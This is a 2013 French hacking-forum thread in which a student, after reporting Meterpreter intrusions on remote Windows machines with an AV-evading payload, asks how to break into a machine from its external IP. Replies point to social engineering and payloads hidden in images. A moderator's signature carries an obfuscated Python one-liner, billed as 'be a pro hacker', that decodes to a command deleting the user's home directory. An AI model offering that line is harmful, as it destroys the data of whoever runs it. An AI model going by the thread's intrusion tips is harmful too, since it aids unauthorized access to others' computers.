Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-04-2013 18:15:19

WS
N00b

Metasploit

Bonjour big_smile

Nouveau et très heureux d'être avec vous dans ce agréable forum biere

Je suis etudiant genie informatique option reseaux & sécurité, bon j'ai travaillé recement avec metasploit, il ya environ une semaine smile , j'ai reussi a pénétrer en "WAN" dans des machines comme XP et Windows 7 (Meterpreter) a l'aide d'un payload qui ne se détécte pas par l'AV, alors je vous demende "s'il vous plait" roll, est ce qu'il y a une attaque metasploit qui me permet de pénétrer dans une machine qui n'est pas dans mon reseau Local sans Payload juste depuis l'adresse ip externe de la victime ? .. Je suis sous Kali linux By the way smile

Bonne journée et gardez le sourire. smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-04-2013 19:26:48

WS
N00b

Re : Metasploit

upupup

#3 10-04-2013 21:03:42

Furyo
Membre Irremplaçable
Site Web

deja un up!!

Bon et bien, Bienvenu à toi tout d'abord wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#4 11-04-2013 13:37:23

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Biemvenue à toi smile
Pour les présentations des membres ça se passe ici Présentation des membres wink
Avant toute chose, lis nos Règles s'il te plait, la prochaine fois que tu fais un up à toi même (très mal vu sur quelque forum que ce soit) ton sujet sera fermé wink
Fais des titres descriptifs qui permettent de cerner le sujet, "metalsploit" est un mauvais titre, beaucoup trop général et imprécis.

#5 11-04-2013 15:54:54

spawn
Modérateur

Réponse : oui

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#6 14-04-2013 04:33:42

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

J'ai reussi a pénétrer en "WAN" dans des machines comme XP et Windows 7 (Meterpreter) a l'aide d'un payload qui ne se détécte pas par l'AV, alors je vous demende "s'il vous plait" , est ce qu'il y a une attaque metasploit qui me permet de pénétrer dans une machine qui n'est pas dans mon reseau Local sans Payload juste depuis l'adresse ip externe de la victime ? ..

Elle est confuse ta question: si tu dis que t'as réussi à pénétrer en WAN dans des machines XP et Seven (donc directement à travers le réseau Internet) en quoi cela te pose un problème à réitérer cette attaque vers une autre cible ne se trouvant pas dans ton réseau local, donc toujours en WAN ? Les machines XP et Seven étaient directement accessibles sans NAT et sans firewall ? est-ce Meterpreter ou un autre payload indétectable ?

Que veux-tu dire pénétrer dans une machine sans payload ? il faudrait que cette machine comporte alors des services comme telnet, ssh, etc en écoute avec lesquels tu te connectes (connaissant le mdp), ou bien une "connexion au bureau à distance" de Windows mais il faut que la machine cible soit déjà configurée pour cela. Mais ça ne peut pas fonctionner car tu dis que la cible n'est pas dans ton réseau local, et donc dans un autre réseau LAN derrière un NAT.

#7 18-04-2013 14:37:25

freekiss
Membre Indéboulonnable
Lieu : Belgique

tout comme spawn, je te dirais que la reponse est oui,
cherche du coté du social engineering....
puis tu peux mettre ton paylod dans une image, etc.......

a++

Si j'étais un crapaud, je serais un backtractien, smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]